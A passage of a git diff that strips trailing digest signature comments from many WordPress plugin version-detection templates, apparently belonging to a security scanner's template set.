4a0a0047304502207ab2d665d93a87ea30cfe859028d03e196e6bdd9665c7d8a737f5b192b345966022100d680e25c8038126ba7f6fed82a471a23ceb608eaf56f7822e7f484fa30271373:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index aaf2cfcb3ee..df3c5f3a944 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b8929c38bc16bc860b0c60bb47e3c1488fca117dec3d9ca4d0192b305d18740a02200f863bb1cb74b3fb0e190cdfff4d327d3f156cd1b27dab27cbe0f73a8f5a1045:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f6cab364585..6a50e049dca 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008f1ceb9e6b1250ee01679ec431db13f5197e09ea9f99c85900226ac03a044fff02210088bba8a371519726dd341bca5c9cb3f4ab86ba0aebdc9b4c97b6d84233327dbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index a353721a9ee..e5326941673 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206427cd8cead5e3e240698c81c7c8c3e9dbf09bb46ba30ce09f0ff3fff274d7c6022012c38f3b956383be24018adbc679d5c6d96ab4fabdba43035795f91d162d3b9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 5367ef60cf5..4c6e616c1d6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009eeb775c55bd4b3535d970b3b036c266f8dd0c87df12189ad70139f98da03527022100a904e15843f148fa55bed792fa3a82b2f2c5b076f8ce37713c3f7e990d824083:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6b067af85f6..a70a58690c3 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206730b8bc898affd0ce3da1830f8b895a487f0f41d843ba269827e725dc2313a6022100b06ed2403148a76e21a5e652a924bc378da04d4aa0a692bcb7334f36010234e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 155c160466f..4e3c68c53a3 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210085bc5cb80bcc35b1e9a5f6cce4806183cc13930f4b4be3e08aa8f5daae4b8ba2022100cea47ae1afd3b8b5c6fb1ae2bda64379ef45001e2075791c76c979ef83931a9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index bac2767798d..0cd866179ee 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ab49e179d8f0bb56970358efcce70a076d6e6822d4e14dc472aa146e69baae4e02204e6f9459827aadbcc3f58a059811dcbc50362bb6269331c7f53bd4e7b1353fec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6a19758c87c..b1d8479d139 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022039ffae78b313888a856bf07ac7cf587bff1d491d20175933cb997e205514d62a02200e0739c11cce30e3c1c78d7a19f3ecc82941fd6dc9a970d37484e48b753cd609:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index e732ea1afba..04e090313f6 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b75a45b3a2be7ca5f806385e92a0e261f648c32945891386705cfffcfca005d8022100c7b46bbd85fbbaae2d20fe9bba37fc0e64653246cb594d5d963b694fdcbd7b94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 6605bc370b4..57e618924be 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e5f6bcfa0b12bde2be684f09b34ac954eb9db81c9a354ddaf534f3b62479eaab022100bbde1a6a03f03e2a757933d2e39b250fe605dfd93ece4a56a3563261c29ac3f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 2ee534e692a..571b3b20a39 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e35d05afe05a5b9f11304c44f8235a64145a40cb91de093c59a8a3c3d3a0900c0220465eb9d24e37135cadd08088b13210642fd580c27f663797e10703bc58749400:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index b173eab2a5e..4d562316b4a 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100893564c7a7c46cdeccf0e33330f66ace91664fd30c6b7766f14d56e4eeae93d002202b828f229d9881e37efb7d65107d633d1400448964dac235f213c2bbc158ab9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 47224616ed5..dcea952545d 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008857696ca5eea0797d763a2bdab2cee863947306d0c58524e01e6ec49a0da9c60221009403163d87ad72265bb94a8cdaed63598a65cd93bdc7bd832a548b17027cd64a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index fe640cffcfa..0ae2f181225 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c63fda43b705b044e6b14bf1738018db4ec16b388438f7776bc2e0047cbe489c022100a5a7310f66aa1acde8874347906e3b445a9dca804e4b769b96484ec51a1823f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 0fa0addbdb1..12f549d5369 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d38fc87f0731a79774ac83022759deddd707255c9baea7f5b72eec441384ab5702205722018af7a9ccf9ad056466e0194f3510681a1e0be97ae82015e851972e1fb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 12d10d8b384..d8ea6a72f1d 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220661b89833b5ae6b3bcc185a66e4a548e3f4e0327f3dc5128b2160eb1fec8f30102206c09aab9dcfea188edaf92ece0390a3e7a9f49aa54f2d05d58abdfe09ab73ce5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index b9d7590df27..4afaf9dc979 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203668622a4e87c4b4865f24b460661d7f86e627be23b5b83c9aaaf434532235c7022004f50f5f3e537d4b3d65b4ab6989e8f1977eb152529562c877aef029bff5fc81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 0f383c11767..88fea67f934 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022058f293a946fecc6da72e9865fef09b8371a762d8c9e6108d2c3e28f76686bda50221008e7fef8351e428d49b6a2b738aa8a31c258530d98dd7f998edc8e291a409ab92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index bb515483627..d205cdbf361 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220607fff18b414cf42694e29df52c62a9438721703b1c24e64c733eb635ac88f80022100c565fa8bd4bb8e29339ce26a806204a3f2bc93294f186ea7cf4b7417d55387fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 1023993ceb6..3fa20df7d26 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220368cfad172de8e1418b9d67edeae7be929309ca7dcf78ebd6c9c4e1d12153b6802205c8738e9f5afae118dc957cd107f31790c3e0a0205a1a61a0e80792ef4bb1e38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bab686eb735..bcd63ced86e 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022025412e4ea8b06dbb1e6467bc51f8f5efd1660a3d5bee0d80412061b3e4c50b04022100fc0d27b088a0b9de5135203b0ea6dd55cd9e39c681e1209d5469afdf0e3bfde0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 35170af76a4..bca0326f2b6 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bfe4b78e10b674b1083f0a12b8d1a4e4e65f320da45251029b96abd3537a4e0b02204483ae486d6d2fd4a8e0b0bcd229fde840764a0996d03dbf47dbf5218950dafe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index ca150498934..854328f04b0 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206e08c841bb5399a2ea23d95f4ee289feaaa0c27705d9314c1202a931ed7c8c91022100e95c87c44b1fbe60d808ba3990eff56eab4cfdcddcc1905c446113ac0ca30c39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 427a4f4d2aa..6d3f7f4566f 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008b2b1d87051c6fe7567403a76bf18f720135f66992506ae3ed2be80e655036ab0221009c8768644a8d5fe951783b52e89eb5671cb935734f0ddfc46762700b7c5130fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 0da0134b71d..a923d21a154 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d7c9e7c74a5e4d95960bb0780027aac378d0d9554ff6e3be313472b323f6d5c5022100edb34fd121baf93ccd889fe35aa9f78d754b4efd7b22e53189df495dbf710108:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 025e00ac5a5..f10480fc8f2 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207e41d7f6b6650450e5d0b12eaf7e54212d6adca18c7bf885266cc161e691082402207e8e73b4df4e21dd23cc47726d1859e7322e83276083aeb46095472276c1ce37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 3921b45b344..6c920917673 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a86e2aa726400f7503dace36e05463574c5c42675879bf370c36734160e08927022064afd7ff65664937033ec9e7daf47228a2d1ece8e67b74775df7765462893e0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 020cc39aa3c..b25c6c9a9ce 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e09b269c963b2d466e2b4461bd2b1e34ce44515e1726bbf1dfd972f14189ac2402201b572fe490b50632cd85404e9e004218ebe37d16021ae3290eeab233302feb2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1580eec5b1f..1781172d05e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aab350f3dcc088fc8642c6ec38f617201b45e6a08b0219cf89754a58b3a9d2360220574a35a4907c849648db8f7ec9e5ce2a9903fc825a0f6de348760122e1e921a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 1d373951b74..92c8ce34093 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dcb22bb64e4a2b62a6d427b459abed5e585cd156f758b14ff2e7111793b4fe6d02201d199f49c15a1af1fa0d92b3bd4973e5b74b4e4c81b6ac16ed4190afec0ef7f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 4e345925990..eea42ed8dad 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c588b94ad7b1ba13002b321cd539213a4890b24e239288968a543b2a371f7343022028b9b7847c7a7bb5bd657df3f815e7216ff27aa09cb4293bcfb8afdea91d4ca9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 990f77bb620..bedb85a0eba 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100814c1784742c116a56f46f93f7cce06de7a9670b94d1c2c4b5a698fd720095310221009498a7d2e04db2adb5f98f8483e4c0813d36daa1d086cfa52a7584af5cdcc0e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 76f04102f8f..45bbbc71df5 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206389702b585158c9330a287c18cff7343e5408702cfe04191ec3885265593714022100d2cfdbfd26cf261253d7024d5108f75c13962895bc5d0a2fe7832444ae47ee96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index b495c2fd71e..03befac73ed 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022000a930b03da6378acb15358fa1aadc71783dbe29fc81507aa8db14ea49ed56a50221008008f3099d569469f2abfec8674a9ba44663213ae450d6168dc4ecdfcfa3741c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index d1c6abf13bc..e1f00931279 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100eb56a3d16277582fd7680a872a9479242ba4bbd758ac40fa2790a4734516074f02210094487b6015cfbd6e4880b73484bee39ebbfb7e4ff5044e62207402dacd98ebc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 953efec6772..0db316d66d6 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aac2fb65b5c35854d9661f779dbb8aba47f754bd7a94174e0df7702024cce30d022100e5a13a7604956d9e31b92f9a089acda9c5e101745e98d7796c7a17336834c50c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 38e50969bb9..135639253d8 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b58ee8ea24bfebaa8c947fa2d8053f7a4249f8d9971f44c58bc0a94e3402c530022100b3ef8073e109771d6b5379fb4b04e7d68a5b17e7cf18115fff6702f07deb11e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index ef8fdc7f8eb..540fbaf9ace 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c02db1e1dc9c5c31fb702724b74efa0c161dca561308c0bc05b25f73b5d35c50022100999fab0545c5cbc473525b5347b14b7273b337465d47c752e2743617d82fd805:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index e9d53076618..7e71b4736fd 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210085973eccb0528762e742261706b0636f3c90f97b6caf73fff8ab81dfc8b237dd022100b11747e1e6fdf09855145438ee3719bbb957919e4185ef96b6dc5a0b2f59f9ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 48179726ca5..88a70b24789 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fd3e5d6495c9353564f8bd039717cfec1c8bcd1cc355aaa1185502f09e09bf8c02210081fc3b5f5be84702592914dac5bc98ff8c063610a0068b79f6261c005bc166bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index ed865d06bde..fc498e67e6d 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d41282ec81ef9258c5c903b819c479f89c91c5b8458835c8e1a10547f6689418022100c4f4aad9e19c2b7319ac504e24cb64597fe515d782175a6d5a237c1ede2c9b74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index f3ba73cdfc2..465aa93d578 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205a1e31d192f32a57be2f88c07dead074782e7e897b3809b3d4d0c230971be58202206fd7a5783ed16d293cd5c0eb56397165534bf87a77bdd68301e14f467a58f681:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index aca9ab4ee34..2a1b0e57a90 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100834e309fee6b38ad469ba1bb6a5cf72f9f0df407fe2dcf6f9945f52f20a9bdcf022100dd157196036f4d6a41948cfd77decc887318e50b81c8d1ea0e090b6638f8c7a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 767938eb9c0..df35e8b415d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022024bcc4bcb7ae7ed9474052942dcb8fbb4e23c2ff023fcb3e9bd70c77126e5c5502201e8516e3f7b5dfb97ed0f074a4059e7b1d34916ca5aec02af232955b03d9075d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 925e533ec7b..033cc4bc3d2 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022064f5b57a253fc8694c776dd57ea50d232f9ecf332489b97d086b855b7a844b1e022030e63d881654934517cdea9b57e82770711ab777987b65472cba414fc2a86d27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index dc70eadd43f..945ab6ad03c 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207b8215f9a920ef042d984dfbef99970e2fe3f592f05904510b00b46391c7b1e20221008af77589464339c020d0956104c71388ae09d8fde6c4ddbe551ec6443d9d73d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index c25aebea7d0..2072b51ab9c 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml 